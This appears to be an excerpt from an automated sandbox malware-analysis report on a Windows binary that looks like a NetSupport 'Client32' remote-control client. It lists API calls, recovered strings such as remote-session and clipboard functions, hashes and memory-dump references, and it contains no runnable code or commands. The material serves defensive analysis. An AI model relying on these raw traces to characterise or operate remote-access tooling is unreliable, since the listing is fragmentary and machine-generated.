                                                                                                      • API String ID: 433899448-0
                                                                                                      • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                                      • Instruction ID: 025ca8484031dfa96f9a41c41fa4ac26639302cc678fcb7cc469232755fdcb6a
                                                                                                      • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                                      • Instruction Fuzzy Hash: 01B092B211434D9B8714EE99EC41C7B339CBAA8600B000909BE0547282CA65FC60A675
                                                                                                      APIs
                                                                                                      • InterlockedIncrement.KERNEL32(111ED4B8), ref: 1102D382
                                                                                                      • Sleep.KERNEL32(0000EA60), ref: 1102D3A5
                                                                                                        • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000501,1102D590,00000000), ref: 11026F72
                                                                                                        • Part of subcall function 11026F20: Sleep.KERNEL32(00000032,?,1102D590,00000001), ref: 11026F76
                                                                                                        • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 11026F97
                                                                                                        • Part of subcall function 11026F20: WaitForSingleObject.KERNEL32(00000000,00000032,?,1102D590,00000001), ref: 11026FA2
                                                                                                        • Part of subcall function 11026F20: CloseHandle.KERNEL32(00000000,1102E392,?,1102D590,00000001), ref: 11026FB4
                                                                                                        • Part of subcall function 11026F20: FreeLibrary.KERNEL32(00000000,00000000,00000000,1102E392,?,1102D590,00000001), ref: 11026FE1
                                                                                                      • GetCurrentProcess.KERNEL32(00000020,00000000,00000000), ref: 1102D3AB
                                                                                                      • SetPriorityClass.KERNEL32(00000000), ref: 1102D3B2
                                                                                                      • SetEvent.KERNEL32(00000260), ref: 1102D3E7
                                                                                                      • Sleep.KERNEL32(000007D0), ref: 1102D4D8
                                                                                                      • PostThreadMessageA.USER32(00000560,00000000,00000000,00000000), ref: 1102D5BC
                                                                                                      • CloseHandle.KERNEL32(00000270), ref: 1102D815
                                                                                                      • _free.LIBCMT ref: 1102D825
                                                                                                      • _free.LIBCMT ref: 1102D841
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1102D8D4
                                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 1102D8E1
                                                                                                      • _memset.LIBCMT ref: 1102D983
                                                                                                      • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 1102D99B
                                                                                                      • FindNextFileA.KERNEL32(00000000,00000010,?,?,?,00000000,00000000), ref: 1102D9C2
                                                                                                      • FindClose.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 1102D9C9
                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 1102DAB7
                                                                                                      • Sleep.KERNEL32(00002710), ref: 1102DABE
                                                                                                      • ExitWindowsEx.USER32(00000006,00000000), ref: 1102DAD4
                                                                                                      • Sleep.KERNEL32(000007D0), ref: 1102DAE0
                                                                                                      • ExitProcess.KERNEL32 ref: 1102DAF4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Sleep$File$CloseExitFindMessagePostThread$HandleProcessWindows_free$AttributesClassCurrentEventFirstFreeIncrementInterlockedLibraryModuleNameNextObjectPrioritySingleWait_memset
                                                                                                      • String ID: *.*$849224$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Error. Multiple Terminate. $Finished terminate$HookDirectSound$Stop tracing, almost terminated$TermUI...$Termed$Terminate Client32 (err=%d)$Unload Hook$Warning. Unprocessed notify NC_CMD, cmd=%d$Warning. Unprocessed notify, type=%d$delete gMain.ev$deleted ipc$pSlash$remove smartcard devices
                                                                                                      • API String ID: 2369127096-1625385770
                                                                                                      • Opcode ID: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                                      • Instruction ID: 7f46233fb5632011b045e2eff7fc4cb47a6b13c38cfe1b2a85386abe64dfbaee
                                                                                                      • Opcode Fuzzy Hash: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                                      • Instruction Fuzzy Hash: D212F778E001229FDB16DFE8CCC4E6DF7A6AB8470CFA401A9E52557644EB71BD80CB52
                                                                                                      APIs
                                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,?), ref: 1103B1B2
                                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 1103B1D9
                                                                                                        • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                                      • DeleteFileA.KERNEL32(?), ref: 1103B23A
                                                                                                      • _sprintf.LIBCMT ref: 1103B2BB
                                                                                                      • _fputs.LIBCMT ref: 1103B330
                                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 1103B3A1
                                                                                                      • _free.LIBCMT ref: 1103B336
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 1103B3DF
                                                                                                        • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: File$AttributesExitProcess$DeleteErrorFolderLastMessageNamePathUser__strdup_fputs_free_sprintf_strrchrwsprintf
                                                                                                      • String ID: %05d$IsA()$P$\Rewards.bin$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                      • API String ID: 383231468-3762817415
                                                                                                      • Opcode ID: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                                      • Instruction ID: bb1b01960f0c7610cbc3075388277e5ec166904b02cd10daef8a33cd2ba906d0
                                                                                                      • Opcode Fuzzy Hash: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                                      • Instruction Fuzzy Hash: 7A71A235D4462AAFDB15CB64CC54FEEB3B4AF54308F0442D8E819A7284EB71AA44CFA0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                                      • API String ID: 0-293745777
                                                                                                      • Opcode ID: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                                      • Instruction ID: daee403c678e01c213c7a1d72acf829bd0b7d6ab4ed81c5860d9e9f482a37d6e
                                                                                                      • Opcode Fuzzy Hash: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                                      • Instruction Fuzzy Hash: 7AA1F535B102069FD710DFA5DC91FAAF3A4EFD834AF10459DEA4A9B380DA31B940CB91
                                                                                                      APIs
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(11147750), ref: 11093089
                                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110930B9
                                                                                                      • FindWindowA.USER32(NSMClassList,00000000), ref: 110930CA
                                                                                                      • SetForegroundWindow.USER32(00000000), ref: 110930D1
                                                                                                        • Part of subcall function 110914F0: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091552
                                                                                                        • Part of subcall function 11092FF0: GetClassInfoA.USER32(110930EC,NSMClassList,?), ref: 11093004
                                                                                                        • Part of subcall function 11091620: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 1109166D
                                                                                                        • Part of subcall function 11091620: UpdateWindow.USER32(?), ref: 110916BF
                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093111
                                                                                                        • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110916EA
                                                                                                        • Part of subcall function 110916D0: TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093120,?,00000000,?,00000000), ref: 11091717
                                                                                                        • Part of subcall function 110916D0: TranslateMessage.USER32(?), ref: 11091721
                                                                                                        • Part of subcall function 110916D0: DispatchMessageA.USER32(?), ref: 1109172B
                                                                                                        • Part of subcall function 110916D0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1109173B
                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 11093135
                                                                                                        • Part of subcall function 11091590: GlobalDeleteAtom.KERNEL32(00000000), ref: 110915CE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: MessageWindow$AtomCreateEventGlobalTranslate$AcceleratorClassCloseDeleteDispatchExceptionFilterFindForegroundHandleInfoOpenUnhandledUpdate_malloc_memsetwsprintf
                                                                                                      • String ID: NSMClassList$NSMFindClassEvent
                                                                                                      • API String ID: 1622498684-2883797795
                                                                                                      • Opcode ID: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                                      • Instruction ID: dc520b378aeee27ae2973ce0394f0415fb857a8947d0a09b3e9437a491b5cd63
                                                                                                      • Opcode Fuzzy Hash: a756580c972c2b1c89b543717e50c84920c15868da069fb40308e575ba74b854
                                                                                                      • Instruction Fuzzy Hash: 7111E976F4821D77EB00A6B51C69F6FBADC5B847A8F001024F92DD62C4EF14E401A7A6
                                                                                                      APIs
                                                                                                        • Part of subcall function 11142DD0: _memset.LIBCMT ref: 11142DF9
                                                                                                        • Part of subcall function 11142DD0: GetVersionExA.KERNEL32(?), ref: 11142E12
                                                                                                      • _memset.LIBCMT ref: 1115B266
                                                                                                      • SendMessageA.USER32(?,000005FF,00000000,00000000), ref: 1115B29C
                                                                                                      • ShowWindow.USER32(?,00000006,?,?,?,?,?), ref: 1115B2AC
                                                                                                      • GetDesktopWindow.USER32 ref: 1115B309
                                                                                                      • TileWindows.USER32(00000000,?,?,?,?), ref: 1115B310
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Window_memset$DesktopMessageSendShowTileVersionWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2935161463-0
                                                                                                      • Opcode ID: 904692d62195826fcfb4a436604818d54d62b693bb951996d617b667ce96a948
                                                                                                      • Instruction ID: b14402a4e76bbdd80eea2f1b3df88d79255beb3666519cd349b4ccd6d2fbdf9c
                                                                                                      • Opcode Fuzzy Hash: 904692d62195826fcfb4a436604818d54d62b693bb951996d617b667ce96a948
                                                                                                      • Instruction Fuzzy Hash: 39410271A00205ABEB809F64CDC5B6EF7B9FF46354F104065E925EB280DB70E940CFA9
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_version), ref: 11063177
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_installed), ref: 1106319C
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_netname), ref: 110631C2
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_remotename), ref: 110631E8
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_bridgename), ref: 1106320E
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_networks), ref: 11063234
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_pingnet), ref: 1106325A
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_open), ref: 11063280
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_close), ref: 110632A6
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getsession), ref: 110632F2
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_call), ref: 11063318
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_hangup), ref: 1106333E
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_nsessions), ref: 11063364
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_connected), ref: 1106338A
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_send), ref: 110633B0
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendex), ref: 110633D6
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendif), ref: 110633EB
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendto), ref: 11063411
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_subset), ref: 1106341C
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_helpreq), ref: 11063468
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_maxpacket), ref: 1106348E
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_openremote), ref: 110634B4
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_closeremote), ref: 110634DA
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_callremote), ref: 11063500
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_pause), ref: 11063442
                                                                                                        • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_findslaves), ref: 110632CC
                                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_myaddr), ref: 11063526
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_loadbridge), ref: 11063531
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getfailedreason), ref: 1106353C
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_escape), ref: 11063547
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_publishservice), ref: 11063552
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_publishserviceex), ref: 1106355D
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_findslavesex), ref: 1106356B
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_broadcastdata), ref: 11063576
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_sendname), ref: 11063584
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getlocalipaddressinuse), ref: 11063592
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_clientpinrequest), ref: 110635A0
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_controlsendpin), ref: 110635AE
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_controlpinrequest), ref: 110635BC
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_clearpin), ref: 110635CA
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getcodepage), ref: 110635D8
                                                                                                      • GetProcAddress.KERNEL32(11074E10,ctl_getconnectivityinfo), ref: 110635E6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$ExitProcess$ErrorLastMessage_strrchrwsprintf
                                                                                                      • String ID: ..\ctl32\Connect.cpp$ctl_bridgename$ctl_broadcastdata$ctl_call$ctl_callremote$ctl_clearpin$ctl_clientpinrequest$ctl_close$ctl_closeremote$ctl_connected$ctl_controlpinrequest$ctl_controlsendpin$ctl_escape$ctl_findslaves$ctl_findslavesex$ctl_getcodepage$ctl_getconnectivityinfo$ctl_getfailedreason$ctl_getlocalipaddressinuse$ctl_getsession$ctl_hangup$ctl_helpreq$ctl_installed$ctl_loadbridge$ctl_maxpacket$ctl_myaddr$ctl_netname$ctl_networks$ctl_nsessions$ctl_open$ctl_openremote$ctl_pause$ctl_pingnet$ctl_publishservice$ctl_publishserviceex$ctl_remotename$ctl_send$ctl_sendex$ctl_sendif$ctl_sendname$ctl_sendto$ctl_subset$ctl_version
                                                                                                      • API String ID: 1096595926-1306570422
                                                                                                      • Opcode ID: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                                      • Instruction ID: 5f24de0e2360826035fa82522da9b4a10218173402b610a7b1cd1951dc97c3b7
                                                                                                      • Opcode Fuzzy Hash: cf51ba996edafb05b73b1d2fbab5a16ed4be44cc98c1f2e0f0545e03da82bd1f
                                                                                                      • Instruction Fuzzy Hash: 96A15DBCF447927AD312AFB76C91FABFEE86F615D8B81042AF449E5901FA60F000C556
                                                                                                      APIs
                                                                                                        • Part of subcall function 1105DE40: __itow.LIBCMT ref: 1105DE65
                                                                                                      • GetObjectA.GDI32(?,0000003C,?), ref: 11005435
                                                                                                        • Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
                                                                                                        • Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2
                                                                                                      • wsprintfA.USER32 ref: 1100548D
                                                                                                      • DeleteObject.GDI32(?), ref: 110054E2
                                                                                                      • DeleteObject.GDI32(?), ref: 110054EB
                                                                                                      • SelectObject.GDI32(?,?), ref: 11005502
                                                                                                      • DeleteObject.GDI32(?), ref: 11005508
                                                                                                      • DeleteDC.GDI32(?), ref: 1100550E
                                                                                                      • SelectObject.GDI32(?,?), ref: 1100551F
                                                                                                      • DeleteObject.GDI32(?), ref: 11005528
                                                                                                      • DeleteDC.GDI32(?), ref: 1100552E
                                                                                                      • DeleteObject.GDI32(?), ref: 1100553F
                                                                                                      • DeleteObject.GDI32(?), ref: 1100556A
                                                                                                      • DeleteObject.GDI32(?), ref: 11005588
                                                                                                      • DeleteObject.GDI32(?), ref: 11005591
                                                                                                      • ShowWindow.USER32(?,00000009), ref: 110055BF
                                                                                                      • PostQuitMessage.USER32(00000000), ref: 110055C7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
